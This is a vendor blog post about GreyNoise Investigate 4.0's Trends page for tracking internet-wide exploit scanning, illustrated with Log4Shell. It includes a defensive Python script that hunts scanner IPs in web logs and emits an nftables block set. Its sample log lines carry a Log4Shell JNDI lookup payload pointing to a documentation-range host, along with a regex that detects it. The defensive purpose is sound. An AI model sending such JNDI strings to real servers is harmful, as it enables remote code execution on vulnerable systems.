Defending Against Emerging Threats with GreyNoise Investigate 4.0

New GreyNoise Trends dashboard helps security analysts identify and respond to opportunistic “exploit” attacks

The increasing frequency of internet-wide exploit attacks targeting newly announced vulnerabilities is a tremendous challenge for security teams. There is a long line of “celebrity vulnerabilities” that we at GreyNoise have observed with increasing alarm. And given our focus on internet noise, customers have naturally been asking for our help in providing visibility into vulnerabilities being actively exploited in the wild.

This is why we created GreyNoise Trends, a new view into the GreyNoise data set to help security analysts identify and respond to internet attacks targeting specific vulnerabilities.

New Vulnerabilities Create A Race Against Time for Security Teams

When a new vulnerability is disclosed, it is a race between attackers and defenders to find the vulnerable servers first. For example, when the Apache Log4j vulnerability (CVE-2021-44228, aka “Log4Shell”) was publicly disclosed on December 9, 2021, GreyNoise saw a dramatic spike in internet-wide scanning for servers exposing the flaw:

Figure: Log4Shell Unique IPs per hour, Source: GreyNoise Research

Note that a few thousand source IP addresses, each sweeping the IPv4 address space for a single vulnerability, generate billions or trillions of connection attempts, a storm of internet noise that makes the genuinely targeted traffic hard to pick out.

For security teams, responding to this kind of event is extremely challenging. Under pressure of a newly announced vulnerability, they need to understand how serious the vulnerability is, whether it is being actively exploited in the wild, whether they are vulnerable, and whether they may have already been compromised. And if they have vulnerable systems, they need to patch them on an emergency basis.

Vulnerability Exploits Used in 34% of Cyber Attacks in 2021

According to a recent report by IBM, severe vulnerabilities in internet-facing enterprise software are being exploited and weaponized at a higher frequency, at massive scale:

  • 34% of attacks in 2021 used vulnerability exploitation - opportunistic “scan-and-exploit” attacks are closing in on phishing as the most-used initial access vector: 34% of attacks leveraged vulnerabilities, compared to 41% for phishing.
  • Vulnerability exploit attacks grew 33% year over year in 2021 - the number of incidents caused by vulnerability exploitation rose 33% from 2020, showing how firmly this vector is established in threat actors’ arsenals.

Furthermore, the amount of time between disclosure of a new vulnerability and the start of active exploitation has been reduced to a matter of hours, leaving defenders with less time to react and respond.

GreyNoise Investigate - Real-Time Visibility and Blocking of Exploit Attacks

GreyNoise Investigate helps security analysts identify and respond to opportunistic “scan-and-exploit” attacks, providing context about the behavior and intent of IP addresses scanning the internet. Investigate allows security teams to:

  • Quickly triage alerts based on malicious, benign, or targeted classifications
  • Identify trending internet attacks targeting specific vulnerabilities and CVEs
  • Block and hunt for IP addresses opportunistically attacking a specific vulnerability

With the release of Investigate 4.0, GreyNoise has created a new Trends page that helps security analysts identify and respond to internet attacks targeting specific vulnerabilities. This new page provides two key capabilities:

  • Attack Trend Visibility - the Trends graph shows the number of IP addresses targeting a specific vulnerability or CVE over time. This visualization lets security teams prioritize internet threats by how actively a vulnerability is actually being exploited in the wild.
  • Dynamic IP lists - the Trends page provides several ways for analysts to obtain a dynamic list of the IP addresses seen scanning for a vulnerability in the past 24 hours. The list can be used for near-term protection by blocking those sources at the firewall or WAF (which buys time but is not a substitute for patching), and as indicators to hunt through logs for systems those sources may already have reached. Because it is a rolling 24-hour window, the list should be re-pulled on a schedule rather than loaded into the firewall once and forgotten.

Taken together, the Trends functionality lets security teams quickly determine whether a vulnerability is relevant to their organization and buys them the time they need to get defenses in place.
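As an added example (not GreyNoise's code or API), the following Python script does the two things described above for a dynamic IP list: it hunts the listed addresses through web server access logs, flagging requests that also carry a JNDI lookup string of the kind used in Log4Shell probes, and it renders the list as an nftables set, refusing to do so if the export is older than the 24-hour window it represents. It assumes the list was exported as plain text with one IPv4 address or CIDR per line and that the web server writes Apache/nginx combined-format logs; the addresses and log lines are constructed sample data from the RFC 5737 documentation ranges, and the pull time is something the operator records when exporting.

```python
"""Hunt a dynamic scanner-IP list against web server logs and emit a firewall block set.

Added example, not GreyNoise code. Assumes a plain-text export (one IPv4 address
or CIDR per line, '#' comments allowed) and combined-format access logs. All
addresses and log lines below are constructed from RFC 5737 documentation ranges.
"""
import ipaddress
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: what a 24-hour dynamic IP list export might look like.
SAMPLE_IP_LIST = """\
# dynamic list, pulled 2021-12-10T12:00:00+00:00
198.51.100.23
198.51.100.77
203.0.113.0/28

192.0.2.250
"""

# Constructed sample access log lines. Three come from listed scanners (one of
# them carrying a JNDI lookup in the query string and User-Agent); two are
# ordinary traffic from unlisted addresses that must not match.
SAMPLE_LOGS = """\
198.51.100.23 - - [10/Dec/2021:12:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Dec/2021:12:01:07 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:12:02:11 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 404 153 "-" "${jndi:ldap://203.0.113.9:1389/a}"
198.51.100.200 - - [10/Dec/2021:12:03:40 +0000] "POST /api/login HTTP/1.1" 401 77 "-" "curl/7.68.0"
192.0.2.250 - - [10/Dec/2021:12:04:02 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "python-requests/2.26"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# Unobfuscated JNDI lookup marker; real probes also use nested-lookup obfuscation
# that this simple pattern will miss, so treat a miss as "not flagged", not "clean".
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def parse_ip_list(text):
    """Return list entries as IPv4Network objects (single addresses become /32)."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def is_listed(ip, nets):
    """True if the address falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def hunt(log_text, nets):
    """Return log lines from listed sources as dicts, noting JNDI payloads."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        try:
            listed = is_listed(m["ip"], nets)
        except ValueError:
            continue  # first field is not an IP (hostname logging); skip it
        if not listed:
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "request": m["req"],
            "status": int(m["status"]),
            "jndi_payload": bool(JNDI_RE.search(line)),
        })
    return hits


def render_nft_set(nets, pulled_at_iso, now_iso=None, max_age_hours=24):
    """Render an nftables set + drop rule for the list.

    Refuses a list older than max_age_hours: the export is a rolling 24-hour
    window, and pushing a stale copy blocks addresses that may have moved on.
    Timestamps are offset-aware ISO 8601 strings, e.g. 2021-12-10T12:00:00+00:00.
    """
    pulled = datetime.fromisoformat(pulled_at_iso)
    now = datetime.fromisoformat(now_iso) if now_iso else datetime.now(timezone.utc)
    if now - pulled > timedelta(hours=max_age_hours):
        raise ValueError(f"IP list pulled at {pulled_at_iso} is stale; re-export it")
    elems = ", ".join(
        net.with_prefixlen if net.prefixlen < 32 else str(net.network_address)
        for net in nets
    )
    return (
        "table inet filter {\n"
        "  set scanner_ips {\n"
        "    type ipv4_addr\n"
        "    flags interval\n"
        f"    elements = {{ {elems} }}\n"
        "  }\n"
        "  chain input {\n"
        "    type filter hook input priority 0; policy accept;\n"
        "    ip saddr @scanner_ips drop\n"
        "  }\n"
        "}\n"
    )


if __name__ == "__main__":
    nets = parse_ip_list(SAMPLE_IP_LIST)
    for hit in hunt(SAMPLE_LOGS, nets):
        flag = " JNDI-PAYLOAD" if hit["jndi_payload"] else ""
        print(f'{hit["ip"]:>15} {hit["status"]} {hit["request"]}{flag}')
    print(render_nft_set(nets, "2021-12-10T12:00:00+00:00", "2021-12-10T13:00:00+00:00"))
```

The hunt returns three hits (two bare probes and one carrying the JNDI string); the two unlisted sources fall through. A listed source that only fetched `/` is still worth a look in application logs, since the scanner-seen-at-the-edge signal says nothing about what it found. The staleness check is deliberate: a block set built from yesterday's export should fail loudly rather than silently drop traffic from addresses no longer in the list.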


Figure: GreyNoise Investigate 4.0 showing the Attack Trends graph for the Apache Log4j vulnerability (CVE-2021-44228)

GreyNoise Trends for Community Accounts

Note that GreyNoise continues to be committed to supporting the broader security community via our free Community plan, and this new GreyNoise Trends functionality is included. Community members will be able to subscribe to a single tag to export the Dynamic IP list.

In addition, for severe vulnerabilities with global impact, GreyNoise will selectively make the full functionality of the paid Trends page available to ANYONE who wants to take advantage of it, including both attack visibility and dynamic IP lists.

Try GreyNoise Trends For Yourself, And Tell Us What You Think

One important note about GreyNoise Trends - we’ve launched this new capability as Beta code, for several reasons:

  • Potential bugs and stability - we decided to build and launch this capability after analyzing our experience during the Apache Log4j vulnerability event in December. Over the past two months, our engineering team has been working hard to build out this functionality. If you notice any issues or have questions about it, please do not hesitate to reach out to our team: support@greynoise.io
  • Learning - we realize that we need to learn more about how analysts and others will use this new, never-before-seen functionality. We’ve made our best guess about how to package this functionality into our Community and Investigate plans, but we know there are things we don’t know.
  • Roadmap - finally, we have a number of ideas about where we think we should take this capability in the future, but we need your help and guidance to shape that direction. If you’re interested in participating in this “futures” discussion, please join us at our 3rd Open Forum on March 17 at 11am ET. You can register to attend here.

So please, sign up for a free GreyNoise Community account if you don’t already have one, try out GreyNoise Trends, and let us know what you think. And to get you started, here are a few interesting Trends pages to check out: